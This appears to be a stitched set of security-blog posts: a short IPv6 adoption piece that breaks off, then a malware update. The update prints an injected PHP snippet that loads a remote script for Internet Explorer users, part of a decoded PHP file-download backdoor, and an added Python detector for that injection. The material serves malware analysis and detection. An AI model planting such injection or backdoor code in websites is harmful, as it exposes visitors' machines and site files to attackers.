IPv6 is not here (yet). In fact, it is still very far

There is news that, because the final IPv4 blocks have been allocated, IPv6 is supposedly “here” now. The news came from APNIC:

APNIC received the following IPv4 address blocks from IANA in February 2011 and will be making allocations from these ranges in the near future:
* 39/8
* 106/8

APNIC reiterates that IPv6 is the only means available for the sustained ongoing growth of the Internet, and urges all Members of the Internet industry to move quickly towards its deployment.

Yes, the final /8 blocks have been allocated. And I agree that with the limited number of IPv4 addresses, we will need to figure out something to do very soon (everyone migrate to IPv6, use more NAT, etc.). However, that doesn’t mean that IPv6 is here already…

In fact, I checked the top 1 million sites from Alexa and only 1,981 of them have IPv6 enabled on their main domain. It means that only 0.19% of them have it already. Very far from mainstream usage.

From the top 10k domains, only 57 have IPv6 enabled (a mere 0.57% of sites):


Weekly malware update – 2010/Jan/31

Weekly malware update. You can track all updates by following our malware_updates category.

*If your site has been affected by any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

.co.cc malicious entries

We reported those issues a while ago (here and here), but we are still seeing a large number of sites infected. The following code is added to a JavaScript file:

<?php $de=”HTTP_USER_AGENT“;$ar=$_SERVER[$de];if(stristr($ar,”MSIE“)&&stristr($ar,”Windows“))echo “Document.write(unescape(“%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6F%69%77%64%64%2E%63%6F%2E%63%63%2F%34%31%22%3E%3C%2F%73%63%72%69%..74%3E`));”

With an .htaccess modification to make such code work:

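An added example, not code from the original post: a small Python check for the injection shape shown above (PHP inside a .js file, gated on an MSIE/Windows user agent, emitting a percent-encoded script tag). The sample input, the placeholder host and the finding labels are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlparse

# Signals taken from the injected snippet shown above; the labels are this example's own.
PHP_TAG = re.compile(r"<\?php", re.I)
UA_GATE = re.compile(r"HTTP_USER_AGENT", re.I)
# A run of 8+ percent-encoded bytes, as passed to unescape() in the sample.
PCT_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){8,}")
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_runs(text):
    """Decode every long percent-encoded run found in text."""
    return [unquote(m.group(0)) for m in PCT_RUN.finditer(text)]


def scan_js(name, text):
    """Return findings for one file's content; an empty list means no signal."""
    findings = []
    if name.lower().endswith(".js") and PHP_TAG.search(text):
        findings.append("php-in-js")
    if UA_GATE.search(text) and "MSIE" in text:
        findings.append("ua-gated-output")
    for decoded in decode_runs(text):
        for src in SCRIPT_SRC.findall(decoded):
            host = urlparse(src).hostname or src
            findings.append("encoded-script-src:" + host)
    return findings


def encode_all(s):
    """Percent-encode every byte, the way the sample payload is encoded."""
    return "".join("%%%02X" % b for b in s.encode())


# Constructed sample: same shape as the page's snippet, placeholder host.
PAYLOAD = encode_all('<script src="http://injected.example/41"></script>')
INFECTED = ('var a=1;\n<?php $ar=$_SERVER["HTTP_USER_AGENT"];'
            'if(stristr($ar,"MSIE")&&stristr($ar,"Windows"))'
            'echo "document.write(unescape(\'' + PAYLOAD + '\'));"; ?>')
CLEAN = 'var u = encodeURIComponent("a b");  // %20 appears once, not a run'

if __name__ == "__main__":
    for label, body in (("jquery.js", INFECTED), ("site.js", CLEAN)):
        print(label, scan_js(label, body))
```

Because the decoder works on whatever encoded run it finds, a payload that is cut off partway, like the one quoted above, still yields the script source host.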

Backdoor: No malware on this code, you can check it by yourself

We were cleaning up an infected web site a few days ago and it had multiple backdoors. They all started like this:

<?php
// ketek90@gmail.com
// no malware on this code, you can check it by yourself ; – )

We see this very often, where malware authors put valid headers and messages to try to disguise what the code does, but never in such a direct way. I guess it just made the job easier for us…

You can see the full backdoor here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=1c7166d7336a50e52175224878466616

As far as what the code does, it decodes to a backdoor:

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
    $file = $_GET['dl'];
    $filez = @file_get_contents($file);
    header("Content-type: application/octet-stream");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment; filename=\"".basename($file)."\";");
    echo $filez;
    exit;
} elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
    $file = $_GET['dlgzip'];…

